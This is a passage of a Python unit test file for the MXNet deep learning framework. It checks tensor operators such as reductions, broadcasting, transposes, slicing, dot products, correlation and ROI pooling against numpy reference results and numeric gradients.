test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.nansum),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
np.where(np.isnan(data), 0, outgrad.reshape(keepdim_shape)),
mx.symbol.nansum, 0.3, test_none_axis=test_none)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.nanprod),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
np.where(np.isnan(data), 0, outgrad.reshape(keepdim_shape) *
(outdata.reshape(keepdim_shape) / data)),
mx.symbol.nanprod, 0.3, test_none_axis=test_none)
# grad of max and min are sensitive to the precision of the calculation.
# Force numpy to match mxnet's float32.
test_reduce_inner(lambda data, axis, keepdims:np_reduce(np.float32(data), axis, keepdims, np.max),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape) *
(np.equal(np.float32(data), outdata.reshape(keepdim_shape))),
mx.symbol.max)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(np.float32(data), axis, keepdims, np.min),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape) *
(np.equal(np.float32(data), outdata.reshape(keepdim_shape))),
mx.symbol.min)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.linalg.norm),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape) * (data / outdata.reshape(keepdim_shape)),
mx.symbol.norm, test_exclude=False, test_none_axis=test_none)
def test_broadcast():
sample_num = 200
for i in range(sample_num):
# Generate random data with ndim between 1 and 5 and all shape dims between 1 and 5
ndim = np.random.randint(1, 6)
target_shape = np.random.randint(1, 6, size=(ndim,))
axis = tuple(set(np.random.randint(0, ndim, np.random.randint(1, ndim + 1))))
shape = target_shape.copy()
size = tuple([shape[ele] for ele in axis])
for ele in axis:
shape[ele] = 1
target_shape_with_zero = list(target_shape)
for idx in range(len(target_shape_with_zero)):
if idx not in axis:
target_shape_with_zero[idx] = 0
break
a = mx.symbol.Variable('a')
sym_bcast_axis = mx.symbol.broadcast_axis(a, axis=axis, size=size)
sym_bcast_to = mx.symbol.broadcast_to(a, shape=tuple(target_shape))
sym_bcast_to_with_zero = mx.symbol.broadcast_to(a, shape=tuple(target_shape_with_zero))
sym_bcast_like = mx.symbol.broadcast_like(a, sym_bcast_to)
def test_broadcasting_ele(sym_bcast):
dat_npy = np.random.rand(*shape)
groundtruth = dat_npy
grad_nd = mx.nd.empty(shape)
outgrad_npy = np.random.rand(*target_shape)
grad_groundtruth = np_reduce(outgrad_npy, axis=axis, keepdims=True,
numpy_reduce_func=np.sum)
net = sym_bcast._bind(default_context(), args={'a': mx.nd.array(dat_npy)},
args_grad={'a': grad_nd})
net.forward(is_train=True)
assert (net.outputs[0].shape == target_shape).all()
assert_almost_equal(net.outputs[0], groundtruth, rtol=1e-4)
net.backward(out_grads=mx.nd.array(outgrad_npy))
assert_almost_equal(grad_nd, grad_groundtruth, rtol=1e-4)
test_broadcasting_ele(sym_bcast_axis)
test_broadcasting_ele(sym_bcast_to)
test_broadcasting_ele(sym_bcast_to_with_zero)
test_broadcasting_ele(sym_bcast_like)
def test_transpose():
for ndim in range(1, 10):
for t in range(5):
dims = list(np.random.randint(1, 5, size=ndim))
axes = list(range(ndim))
random.shuffle(axes)
axes = tuple(axes)
x = mx.nd.array(np.random.normal(size=dims))
y = mx.nd.transpose(x, axes=axes)
assert_allclose(np.transpose(x.asnumpy(), axes=axes), y.asnumpy())
y = mx.nd.transpose(x)
assert_allclose(np.transpose(x.asnumpy()), y.asnumpy())
@pytest.mark.serial
def test_pseudo2dtranspose():
def getTwoInts(mn, mx):
n1 = np.random.randint(mn, mx)
n2 = np.random.randint(mn, mx-1)
n2 = n2 if n2 < n1 else n2+1
return tuple(np.sort([n1, n2]))
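# Build an axes permutation that moves one contiguous block of axes to another position,
# i.e. the kind of permutation the pseudo-2D transpose path is meant to handle;
# getTwoInts above picks the block boundaries.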
def getTranspAxes(ndim):
axes = list(range(ndim))
n1, n2 = getTwoInts(0,ndim)
return tuple(axes[:n1]+axes[n2:]+axes[n1:n2])
for ndim in range(2, 7):
for dt in ['int8', 'half', 'int32', 'int64']:
for _ in range(5):
dims = list(np.random.randint(5, 20, size=ndim))
axes = getTranspAxes(ndim)
x = mx.nd.array(np.random.normal(size=dims), dtype=dt)
y = mx.nd.transpose(x, axes=axes)
assert_allclose(np.transpose(x.asnumpy(), axes=axes), y.asnumpy())
@pytest.mark.serial
def test_big_transpose():
n = [1]
d = list(np.random.randint(132, 160, size=1))
hw = list(np.random.randint(256, 320, size=2))
c = [10]
dims = n + d + hw + c
axes = (0,4,1,2,3)
x_np = np.random.normal(size=dims).astype('uint8')
x = mx.nd.array(x_np, dtype='uint8')
y = mx.nd.transpose(x, axes=axes)
assert_allclose(np.transpose(x_np, axes=axes), y.asnumpy().astype('uint8'))
axes = (0,2,3,4,1)
z = mx.nd.transpose(y, axes=axes)
assert_allclose(x_np, z.asnumpy().astype('uint8'))
@pytest.mark.serial
def test_larger_transpose():
x = mx.nd.random.normal(shape=(50,51))
y = mx.nd.transpose(x)
assert_allclose(np.transpose(x.asnumpy()), y.asnumpy())
def test_expand_dims():
for ndim in range(1, 6):
for axis in range(-ndim + 1, ndim):
x = np.random.normal(size=list(np.random.randint(1, 10, size=ndim)))
y = mx.nd.array(x)
x1 = np.expand_dims(x, axis=axis)
y1 = mx.nd.expand_dims(y, axis=axis)
assert_allclose(x1, y1.asnumpy())
assert_allclose(x1.shape, y1.shape)
def test_crop():
for ndim in range(1, 6):
for t in range(5):
dims = []
begin = []
end = []
idx = []
for i in range(ndim):
d = random.randint(1, 5)
b = random.randint(0, d-1)
e = random.randint(b+1, d)
if b == 0 and random.randint(0, 1):
b = None
elif b != 0 and random.randint(0, 1):
b -= d
if e == d and random.randint(0, 1):
e = None
elif e != d and random.randint(0, 1):
e -= d
dims.append(d)
begin.append(b)
end.append(e)
idx.append(slice(b, e))
x = mx.nd.array(np.random.normal(size=dims))
y = mx.nd.crop(x, begin=tuple(begin), end=tuple(end))
assert_allclose(x.asnumpy()[idx], y.asnumpy())
vx = mx.sym.Variable('x')
vy = mx.sym.crop(vx, begin=tuple(begin), end=tuple(end))
check_numeric_gradient(vy, [x.asnumpy()])
def test_slice_axis():
for ndim in range(1, 6):
shape = np.random.randint(1, 11, size=(ndim,))
for t in range(ndim):
d = shape[t]
b = random.randint(0, d-1)
e = random.randint(b+1, d)
if np.random.rand() > 0.6:
e = None
else:
if e < d and np.random.rand() > 0.5:
e = e - d
if np.random.rand() > 0.5:
b = b - d
idx = []
for i in range(ndim):
idx.append(slice(0, shape[i]))
idx[t] = slice(b, e)
X = mx.symbol.Variable('X')
x = mx.nd.array(np.random.normal(size=shape))
Y = mx.symbol.slice_axis(data=X, axis=t, begin=b, end=e)
xgrad = mx.nd.empty(x.shape)
exec1 = Y._bind(default_context(), args = [x], args_grad = {'X': xgrad})
exec1.forward(is_train=True)
y = exec1.outputs[0]
assert_allclose(x.asnumpy()[idx], y.asnumpy())
exec1.backward([y])
xx = x.asnumpy()
xx[:] = 0.0
xx[idx] = x.asnumpy()[idx]
assert_allclose(xx, xgrad.asnumpy())
x_grad_npy = np.random.normal(size=x.shape)
xgrad = mx.nd.array(x_grad_npy)
exec2 = Y._bind(default_context(), args=[x], args_grad={'X': xgrad}, grad_req="add")
exec2.forward(is_train=True)
exec2.backward([exec2.outputs[0]])
xx = np.zeros(shape=x.shape, dtype=np.float32)
xx[idx] = x.asnumpy()[idx]
assert_allclose(xx + x_grad_npy, xgrad.asnumpy(), atol=1E-5)
def test_slice_like():
for ndim in range(1, 6):
from_shape = np.random.randint(1, 11, size=(ndim,))
shape = [s + np.random.randint(0, 3) for s in from_shape]
for t in range(ndim):
if t > 0:
axes = np.random.randint(0, ndim, size=t).tolist()
else:
axes = []
idx = []
for i in range(ndim):
idx.append(slice(0, shape[i]))
if i in axes or not axes:
idx[i] = slice(0, from_shape[i])
if axes:
pos = np.random.randint(0, t)
if axes[pos] > 0:
axes[pos] -= ndim # negative index
X = mx.symbol.Variable('X')
X_1 = mx.symbol.Variable('X1')
x = mx.nd.array(np.random.normal(size=shape))
x1 = mx.nd.array(np.random.normal(size=from_shape))
Y = mx.symbol.slice_like(data=X, shape_like=X_1, axes=axes)
xgrad = mx.nd.empty(x.shape)
xgrad1 = mx.nd.empty(x1.shape)
exec1 = Y._bind(default_context(), args = [x, x1],
args_grad = {'X': xgrad, 'X1': xgrad1})
exec1.forward(is_train=True)
y = exec1.outputs[0]
assert_allclose(x.asnumpy()[idx], y.asnumpy())
exec1.backward([y])
xx = x.asnumpy()
xx[:] = 0.0
xx[idx] = x.asnumpy()[idx]
assert_allclose(xx, xgrad.asnumpy())
assert_allclose(xgrad1.asnumpy(), mx.nd.zeros_like(xgrad1).asnumpy())
def test_slice_like_different_types():
x = [[ 1., 2., 3., 4.],
[ 5., 6., 7., 8.],
[ 9., 10., 11., 12.]]
y = [[ 0., 0., 0.],
[ 0., 0., 0.]]
x = mx.nd.array(x)
y = mx.nd.array(y).astype('int32')
z = mx.nd.slice_like(x, y)
assert_allclose(z.asnumpy(), [[1,2,3],[5,6,7]])
def test_reshape_like_different_types():
x = mx.nd.zeros((2, 3))
y = mx.nd.array([[1, 2], [3, 4], [5, 6]])
y = mx.nd.array(y).astype('int32')
z = mx.nd.reshape_like(x, y)
assert_allclose(z.asnumpy(), [[0,0],[0,0],[0,0]])
def test_broadcast_like_different_types():
x = mx.nd.zeros((2, 1))
y = mx.nd.ones((2, 2))
y = mx.nd.array(y).astype('int32')
z = mx.nd.broadcast_like(x, y)
assert_allclose(z.asnumpy(), [[0,0],[0,0]])
assert x.dtype == z.dtype
def test_flip():
for ndim in range(1, 6):
for t in range(5):
dims = [random.randint(1,10) for i in range(ndim)]
axis = random.randint(0, ndim-1)
idx = [slice(None, None, -1) if i == axis else slice(None, None) for i in range(ndim)]
x = mx.nd.array(np.random.normal(size=dims))
y = mx.nd.flip(x, axis=axis)
assert_allclose(x.asnumpy()[idx], y.asnumpy())
def test_stn():
import sys
np.set_printoptions(threshold=sys.maxsize)
num_filter = 2 # conv of loc net
kernel = (3, 3) # conv of loc net
num_hidden = 6 # fc of loc net
for n in [1, 2, 3, 4]:
for c in [1, 2, 3, 4]:
for h in [5, 9, 13, 17]: # for convenience of testing, the third and fourth input dims should be 4x + 1
for w in [5, 9, 13, 17]:
data_shape = (n, c, h, w)
target_shape = (int((data_shape[2]+1)/2), int((data_shape[3]+1)/2))
data = mx.sym.Variable(name="data")
loc = mx.sym.Convolution(data=data, kernel=kernel, pad=(1, 1), num_filter=num_filter, name="loc_conv")
loc = mx.sym.Flatten(data=loc)
loc = mx.sym.FullyConnected(data=loc, num_hidden=num_hidden, name="loc_fc")
stn = mx.sym.SpatialTransformer(data=data, loc=loc, target_shape=target_shape,
transform_type="affine", sampler_type="bilinear")
arg_names = stn.list_arguments()
arg_shapes, out_shapes, _ = stn.infer_shape(data=data_shape)
# check shape
assert out_shapes[0] == (data_shape[0], data_shape[1], target_shape[0], target_shape[1])
dev = default_context()
#dev = mx.gpu(0)
args = {}
args['data'] = mx.random.normal(0, 1, data_shape, ctx=mx.cpu()).copyto(dev)
args['loc_conv_weight'] = mx.nd.zeros((num_filter, data_shape[1], kernel[0], kernel[1]), ctx=dev)
args['loc_conv_bias'] = mx.nd.zeros((num_filter,), ctx=dev)
args['loc_fc_weight'] = mx.nd.zeros((6, num_filter*data_shape[2]*data_shape[3]), ctx=dev)
args['loc_fc_bias'] = mx.nd.array([0.5, 0, 0, 0, 0.5, 0], ctx=dev)
grad_grad = [mx.nd.zeros(shape, ctx=dev) for shape in arg_shapes]
exe = stn._bind(dev, args=args, args_grad=grad_grad)
exe.forward(is_train=True)
out = exe.outputs[0]
# check forward
assert_almost_equal(out, args['data'].asnumpy()[:, :, h//4:h-h//4, w//4:w-w//4], rtol=1e-2, atol=1e-4)
out_grad = mx.nd.ones(out.shape, ctx=dev)
exe.backward([out_grad])
# check backward
assert_almost_equal(out_grad, grad_grad[0].asnumpy()[:, :, h//4:h-h//4, w//4:w-w//4], rtol=1e-2, atol=1e-4)
def test_stn_valid_sampling():
target_shape = (
28,
28,
)
src_shape = (
42,
42,
)
data = mx.sym.Variable(name="data")
loc = mx.sym.Variable(name="loc")
data_array = np.zeros((
1,
1,
) + src_shape)
# Have an ever so slight rotation.
loc_array = np.array(
[[9.03887e-05, 1.00015, 0.00174931, 1.0003, 0.000311901,
-0.000919065]])
stn = mx.sym.SpatialTransformer(
data=data,
loc=loc,
target_shape=target_shape,
transform_type="affine",
sampler_type="bilinear")
grad_req = {k: 'write' for k in stn.list_arguments()}
grads = {
'data': mx.nd.array(np.zeros_like(data_array)),
'loc': mx.nd.array(np.zeros_like(loc_array))
}
executor = stn._bind(
ctx=default_context(),
args={'data': mx.nd.array(data_array),
'loc': mx.nd.array(loc_array)},
grad_req=grad_req,
args_grad=grads)
executor.forward(is_train=True)
executor.backward(mx.nd.ones((
1,
1,
) + target_shape))
def test_dot():
ctx = default_context()
dtypes = ['float32', 'float64']
ndims = [2]
if ctx.device_type == 'gpu':
dtypes += ['float16']
ndims += [1]
# Test normal dot.
for ndim in ndims:
for data_type in dtypes:
tol = 1e-2 if data_type == 'float16' else 1e-3
for m in range(1, 5):
for k in range(1, 5):
if ndim == 1 and k != 1:
continue  # for the 1-D case only k == 1 is meaningful; skip redundant iterations
for n in range(1, 5):
a_shape = (m, k) if ndim == 2 else (m,)
b_shape = (k, n) if ndim == 2 else (n,)
a_npy = np.random.normal(0, 1, (m, k))
a_npy = a_npy.astype(data_type)
b_npy = np.random.normal(0, 1, (k, n))
b_npy = b_npy.astype(data_type)
c_npy = np.empty((m, n), dtype=data_type)
ograd_npy = np.random.normal(0, 1, (m, n))
ograd_npy = ograd_npy.astype(data_type)
agrad_npy = np.empty((m, k), dtype=data_type)
bgrad_npy = np.empty((k, n), dtype=data_type)
c_npy[:, :] = np.dot(a_npy[:, :], b_npy[:, :])
bgrad_npy[:, :] = np.dot(a_npy[:, :].T, ograd_npy[:, :])
agrad_npy[:, :] = np.dot(ograd_npy[:, :], b_npy[:, :].T)
a = mx.sym.Variable('a', dtype=data_type)
b = mx.sym.Variable('b', dtype=data_type)
c = mx.sym.dot(a, b)
exe = c._simple_bind(ctx=ctx, a=a_npy.shape, b=b_npy.shape)
outputs = exe.forward(is_train=True, a=a_npy, b=b_npy)
assert_almost_equal(outputs[0], c_npy, rtol=tol, atol=tol)
exe.backward(out_grads=[mx.nd.array(ograd_npy, mx.cpu()).astype(data_type)])
assert_almost_equal(exe.grad_dict['a'], agrad_npy, rtol=tol, atol=tol)
assert_almost_equal(exe.grad_dict['b'], bgrad_npy, rtol=tol, atol=tol)
# Test dot with transpose flag using gradient checker.
def dot_sym(data_type):
x = mx.sym.Variable('x', dtype=data_type)
y = mx.sym.Variable('y', dtype=data_type)
return mx.sym.dot(x, y)
def dot_sym_xT(data_type):
x = mx.sym.Variable('x', dtype=data_type)
y = mx.sym.Variable('y', dtype=data_type)
return mx.sym.dot(x, y, transpose_a=True)
def dot_sym_yT(data_type):
x = mx.sym.Variable('x', dtype=data_type)
y = mx.sym.Variable('y', dtype=data_type)
return mx.sym.dot(x, y, transpose_b=True)
def dot_sym_xT_yT(data_type):
x = mx.sym.Variable('x', dtype=data_type)
y = mx.sym.Variable('y', dtype=data_type)
return mx.sym.dot(x, y, transpose_a=True, transpose_b=True)
for data_type in dtypes:
for ashape, bshape in [((3, 4), (4, 5)), ((2, 3, 4), (4, 5, 6))]:
m1_npy = np.random.uniform(-1, 1, ashape)
m1_npy = m1_npy.astype(data_type)
m2_npy = np.random.uniform(-1, 1, bshape)
m2_npy = m2_npy.astype(data_type)
check_numeric_gradient(dot_sym(data_type), [m1_npy, m2_npy], numeric_eps=1e-1, rtol=2e-2, atol=1e-3)
check_numeric_gradient(dot_sym_xT(data_type), [m1_npy.T, m2_npy], numeric_eps=1e-1, rtol=2e-2, atol=1e-3)
check_numeric_gradient(dot_sym_yT(data_type), [m1_npy, m2_npy.T], numeric_eps=1e-1, rtol=2e-2, atol=1e-3)
check_numeric_gradient(dot_sym_xT_yT(data_type), [m1_npy.T, m2_npy.T], numeric_eps=1e-1, rtol=2e-2, atol=1e-3)
def test_batch_dot():
ctx = default_context()
dtypes = ['float32', 'float64']
if ctx.device_type == 'gpu':
dtypes += ['float16']
for data_type in dtypes:
for batch_size in range(1, 5):
for m in range(1, 5):
for k in range(1, 5):
for n in range(1, 5):
transpose_a = (np.random.rand() > 0.5)
transpose_b = (np.random.rand() > 0.5)
a_npy = np.random.normal(0, 1, (batch_size, m, k))
a_npy = a_npy.astype(data_type)
b_npy = np.random.normal(0, 1, (batch_size, k, n))
b_npy = b_npy.astype(data_type)
c_npy = np.empty((batch_size, m, n), dtype=data_type)
ograd_npy = np.random.normal(0, 1, (batch_size, m, n))
ograd_npy = ograd_npy.astype(data_type)
agrad_npy = np.empty((batch_size, m, k), dtype=data_type)
bgrad_npy = np.empty((batch_size, k, n), dtype=data_type)
a_init_grad_npy = np.random.normal(size=(batch_size, m, k))
a_init_grad_npy = a_init_grad_npy.astype(data_type)
b_init_grad_npy = np.random.normal(size=(batch_size, k, n))
b_init_grad_npy = b_init_grad_npy.astype(data_type)
for i in range(batch_size):
c_npy[i, :, :] = np.dot(a_npy[i, :, :], b_npy[i, :, :])
bgrad_npy[i, :, :] = np.dot(a_npy[i, :, :].T, ograd_npy[i, :, :])
agrad_npy[i, :, :] = np.dot(ograd_npy[i, :, :], b_npy[i, :, :].T)
a = mx.sym.Variable('a', dtype=data_type)
b = mx.sym.Variable('b', dtype=data_type)
c = mx.sym.batch_dot(a, b, transpose_a=transpose_a, transpose_b=transpose_b)
if transpose_a:
a_npy = np.transpose(a_npy, axes=(0, 2, 1))
agrad_npy = np.transpose(agrad_npy, axes=(0, 2, 1))
a_init_grad_npy = np.transpose(a_init_grad_npy, axes=(0, 2, 1))
if transpose_b:
b_npy = np.transpose(b_npy, axes=(0, 2, 1))
bgrad_npy = np.transpose(bgrad_npy, axes=(0, 2, 1))
b_init_grad_npy = np.transpose(b_init_grad_npy, axes=(0, 2, 1))
exe = c._simple_bind(ctx=ctx,
a=a_npy.shape, b=b_npy.shape, grad_req='write')
exe_add = c._simple_bind(ctx=ctx,
a=a_npy.shape, b=b_npy.shape, grad_req='add')
exe_add.grad_dict['a'][:] = a_init_grad_npy
exe_add.grad_dict['b'][:] = b_init_grad_npy
outputs = exe.forward(is_train=True, a=a_npy, b=b_npy)
assert_almost_equal(outputs[0], c_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
exe.backward(out_grads=[mx.nd.array(ograd_npy, dtype=outputs[0].dtype, ctx=exe._ctx)])
assert_almost_equal(exe.grad_dict['a'], agrad_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
assert_almost_equal(exe.grad_dict['b'], bgrad_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
exe_add.forward(is_train=True, a=a_npy, b=b_npy)
exe_add.backward(out_grads=[mx.nd.array(ograd_npy, dtype=exe_add.outputs[0].dtype, ctx=exe._ctx)])
assert_almost_equal(exe_add.grad_dict['a'],
agrad_npy + a_init_grad_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
assert_almost_equal(exe_add.grad_dict['b'],
bgrad_npy + b_init_grad_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
def get_correlation(data1,data2,kernel_size,max_displacement,stride1,stride2,pad_size,is_multiply):
img1 = mx.sym.Variable('img1')
img2 = mx.sym.Variable('img2')
return mx.sym.Correlation(data1=img1,data2=img2,kernel_size =kernel_size,max_displacement = max_displacement,
stride1 = stride1,stride2 = stride2,pad_size= pad_size,is_multiply = is_multiply)
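# Numpy reference for the Correlation op forward pass: for each output location and each
# displacement channel, accumulate the patch-wise product (is_multiply=True) or absolute
# difference of the two zero-padded inputs, then normalize by the patch volume.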
def correlation_forward(data1,data2,pad_size,kernel_size,stride1,stride2,max_displacement,is_multiply):
# compute output's dimension
paddedbottomheight = data1.shape[2] + 2 * pad_size
paddedbottomwidth = data1.shape[3] + 2 * pad_size
kernel_radius = (kernel_size - 1) // 2
border_size = max_displacement + kernel_radius
top_width = (paddedbottomwidth - border_size * 2) // stride1
top_height = (paddedbottomheight - border_size * 2) // stride1
neighborhood_grid_radius = max_displacement // stride2
neighborhood_grid_width = neighborhood_grid_radius * 2 + 1
top_channels = neighborhood_grid_width * neighborhood_grid_width
out = np.zeros((data1.shape[0], top_channels, top_height, top_width))
tmp1 = np.zeros((data1.shape[0],data1.shape[1],paddedbottomheight, paddedbottomwidth))
tmp2 = np.zeros((data1.shape[0],data1.shape[1],paddedbottomheight, paddedbottomwidth))
tmp1[:, :, pad_size:pad_size + data1.shape[2], pad_size:pad_size + data1.shape[3]] = data1[:,:,:,:]
tmp2[:, :, pad_size:pad_size + data2.shape[2], pad_size:pad_size + data2.shape[3]] = data2[:,:,:,:]
for i in range(top_height):
for j in range(top_width):
for nbatch in range(data1.shape[0]):
# (x1, y1) is the location in data1; (i, j) is the location in the output
x1 = j * stride1 + max_displacement
y1 = i * stride1 + max_displacement
for top_channel in range(top_channels):
s2o = (top_channel % neighborhood_grid_width - neighborhood_grid_radius) * stride2
s2p = (top_channel // neighborhood_grid_width - neighborhood_grid_radius) * stride2
# location in data2
x2 = x1 + s2o
y2 = y1 + s2p
for h in range(kernel_size):
for w in range(kernel_size):
for channel in range(data1.shape[1]):
if is_multiply:
out[nbatch, top_channel, i, j] += tmp1[nbatch, channel,y1 + h, x1 + w] * tmp2[nbatch, channel, y2 + h,x2 + w]
else:
out[nbatch, top_channel, i, j] += abs(tmp1[nbatch, channel, y1 + h, x1 + w] - tmp2[nbatch, channel, y2 + h, x2 + w])
out /= float(kernel_size**2*data1.shape[1])
return out,tmp1,tmp2
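# Numpy reference for the Correlation op backward pass: distribute the output gradient back
# onto the padded inputs (product rule when is_multiply, sign of the difference otherwise)
# and crop the padding off before returning the input gradients.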
def correlation_backward(out_grad,tmp1,tmp2,data1,data2,pad_size,kernel_size,stride1,stride2,max_displacement,is_multiply):
# compute output's dimension
paddedbottomheight = data1.shape[2] + 2 * pad_size
paddedbottomwidth = data1.shape[3] + 2 * pad_size
kernel_radius = (kernel_size - 1) // 2
border_size = max_displacement + kernel_radius
top_width = (paddedbottomwidth - border_size * 2) // stride1
top_height = (paddedbottomheight - border_size * 2) // stride1
neighborhood_grid_radius = max_displacement // stride2
neighborhood_grid_width = neighborhood_grid_radius * 2 + 1
top_channels = neighborhood_grid_width * neighborhood_grid_width
out = np.zeros((data1.shape[0], top_channels, top_height, top_width))
tmp1_grad = np.zeros(tmp1.shape)
tmp2_grad = np.zeros(tmp2.shape)
for i in range(top_height):
for j in range(top_width):
for nbatch in range(data1.shape[0]):
# (x1, y1) is the location in data1; (i, j) is the location in the output
x1 = j * stride1 + max_displacement
y1 = i * stride1 + max_displacement
for top_channel in range(top_channels):
s2o = (top_channel % neighborhood_grid_width - neighborhood_grid_radius) * stride2
s2p = (top_channel // neighborhood_grid_width - neighborhood_grid_radius) * stride2
# location in data2
x2 = x1 + s2o
y2 = y1 + s2p
for h in range(kernel_size):
for w in range(kernel_size):
for channel in range(data1.shape[1]):
if is_multiply:
tmp1_grad[nbatch,channel,y1+h,x1+w]+= out_grad[nbatch,top_channel,i,j]*tmp2[nbatch, channel, y2 + h,x2 + w]
tmp2_grad[nbatch,channel,y2+h,x2+w]+= out_grad[nbatch,top_channel,i,j]*tmp1[nbatch, channel, y1 + h,x1 + w]
else:
sgn = 1 if (tmp1[nbatch, channel, y1 + h,x1 + w]>=tmp2[nbatch, channel, y2 + h,x2 + w]) else -1
tmp1_grad[nbatch,channel,y1+h,x1+w]+= out_grad[nbatch,top_channel,i,j]*sgn
tmp2_grad[nbatch,channel,y2+h,x2+w]+= out_grad[nbatch,top_channel,i,j]*(-sgn)
tmp1_grad = tmp1_grad / float(kernel_size**2*data1.shape[1])
tmp2_grad = tmp2_grad / float(kernel_size**2*data1.shape[1])
return tmp1_grad[:,:,pad_size:pad_size+data1.shape[2],pad_size:pad_size+data1.shape[3]],tmp2_grad[:,:,pad_size:pad_size+data1.shape[2],pad_size:pad_size+data1.shape[3]],
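# Compare the Correlation operator against the numpy reference above, forward and backward.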
def unittest_correlation(data_shape,kernel_size,max_displacement,stride1,stride2,pad_size,is_multiply,dtype):
img1 = np.random.random(data_shape)
img1 = img1.astype(dtype)
img2 = np.random.random(data_shape)
img2 = img2.astype(dtype)
net1 = get_correlation(img1,img2,kernel_size,max_displacement,stride1,stride2,pad_size,is_multiply)
net2 = get_correlation(img1,img2,kernel_size,max_displacement,stride1,stride2,pad_size,is_multiply )
exe1 = net1._simple_bind(default_context(),img1=img1.shape,img2=img1.shape)
exe1.arg_dict['img1'][:] = img1
exe1.arg_dict['img2'][:] = img2
#cpu forward
exe1.forward(is_train=True)
# python forward
forward_result,tmp1,tmp2 = correlation_forward(img1,img2,pad_size,kernel_size,stride1,stride2,max_displacement,is_multiply)
# forward error
assert_almost_equal(exe1.outputs[0], forward_result, rtol=1e-4, atol=1e-4)
# out_grad
a = np.ones(forward_result.shape)
out_grad1 = mx.nd.array(a,default_context())
# cpu backward
exe1.backward(out_grads=out_grad1)
# python backward
grad1,grad2 = correlation_backward(a,tmp1,tmp2,img1,img2,pad_size,kernel_size,stride1,stride2,max_displacement,is_multiply)
# backward error
assert_almost_equal(exe1.grad_dict['img1'], grad1, rtol=1e-3, atol=1e-4)
assert_almost_equal(exe1.grad_dict['img2'], grad2, rtol=1e-3, atol=1e-4)
def test_correlation():
def test_infer_type(dtype):
a = mx.sym.Variable('a')
b = mx.sym.Variable('b')
corr = mx.sym.Correlation(data1=a, data2=b)
arg_type1, out_type1, _ = corr.infer_type(a=dtype)
if arg_type1[0] != np.dtype(dtype) or arg_type1[1] != np.dtype(dtype) or out_type1[0] != np.dtype(dtype):
msg = np.testing.build_err_msg([a, b],
err_msg="Inferred type from a is not as expected, "
"Expected: %s %s %s, Got: %s %s %s"
% (dtype, dtype, dtype, arg_type1[0], arg_type1[1], out_type1[0]),
names=['a', 'b'])
raise AssertionError(msg)
arg_type2, out_type2, _ = corr.infer_type(b=dtype)
if arg_type2[0] != np.dtype(dtype) or arg_type2[1] != np.dtype(dtype) or out_type2[0] != np.dtype(dtype):
msg = np.testing.build_err_msg([a, b],
err_msg="Inferred type from b is not as expected, "
"Expected: %s %s %s, Got: %s %s %s"
% (dtype, dtype, dtype, arg_type2[0], arg_type2[1], out_type2[0]),
names=['a', 'b'])
raise AssertionError(msg)
for dtype in ['float16', 'float32']:
test_infer_type(dtype)
unittest_correlation((1,3,10,10), kernel_size = 1,max_displacement = 4,stride1 = 1,stride2 = 1,pad_size = 4,is_multiply = False, dtype = dtype)
unittest_correlation((5,1,15,15), kernel_size = 1,max_displacement = 5,stride1 = 1,stride2 = 1,pad_size = 5,is_multiply = False, dtype = dtype)
unittest_correlation((5,1,15,15), kernel_size = 1,max_displacement = 5,stride1 = 1,stride2 = 1,pad_size = 5,is_multiply = True, dtype = dtype)
unittest_correlation((5,1,15,15), kernel_size = 1,max_displacement = 10,stride1 = 1,stride2 = 2,pad_size = 10,is_multiply = True, dtype = dtype)
unittest_correlation((5,1,4,4), kernel_size = 3,max_displacement = 1,stride1 = 1,stride2 = 1,pad_size = 2,is_multiply = True, dtype = dtype)
unittest_correlation((5,1,4,4), kernel_size = 3,max_displacement = 1,stride1 = 2,stride2 = 1,pad_size = 2,is_multiply = True, dtype = dtype)
unittest_correlation((5,1,4,4), kernel_size = 3,max_displacement = 1,stride1 = 2,stride2 = 1,pad_size = 2,is_multiply = False, dtype = dtype)
unittest_correlation((5,1,6,4), kernel_size = 3,max_displacement = 1,stride1 = 2,stride2 = 1,pad_size = 2,is_multiply = False, dtype = dtype)
unittest_correlation((5,1,11,11), kernel_size = 5,max_displacement = 1,stride1 = 1,stride2 = 1,pad_size = 2,is_multiply = False, dtype = dtype)
with pytest.raises(MXNetError):
unittest_correlation((1,3,10,10), kernel_size = 1,max_displacement = 4,stride1 = 0,stride2 = 1,pad_size = 4,is_multiply = False, dtype = dtype)
with pytest.raises(MXNetError):
unittest_correlation((5,1,15,15), kernel_size = 1,max_displacement = 5,stride1 = 1,stride2 = 0,pad_size = 5,is_multiply = False, dtype = dtype)
with pytest.raises(MXNetError):
unittest_correlation((5,1,15,15), kernel_size = 1,max_displacement = 5,stride1 = 1,stride2 = 0,pad_size = 5,is_multiply = True, dtype = dtype)
with pytest.raises(MXNetError):
unittest_correlation((1,3,10,10), kernel_size = 1,max_displacement = 4,stride1 = 0,stride2 = 1,pad_size = 4,is_multiply = True, dtype = dtype)
# Seed set because the test is not robust enough to operate on random data
@pytest.mark.seed(1234)
def test_roipooling():
data = mx.symbol.Variable(name='data')
rois = mx.symbol.Variable(name='rois')
test = mx.symbol.ROIPooling(data=data, rois=rois, pooled_size=(4, 4), spatial_scale=1)
x1 = np.random.rand(4, 3, 12, 8).astype('float32')
x2 = np.array([[0, 1.1, 1.1, 6.2, 6.2], [2, 6.1, 2.1, 8.2, 11.2], [1, 3.1, 1.1, 5.2, 10.2], [0, 3, 3, 3, 3]], dtype='float32')
check_numeric_gradient(sym=test, location=[x1, x2],
grad_nodes={'data':'write', 'rois':'null'},
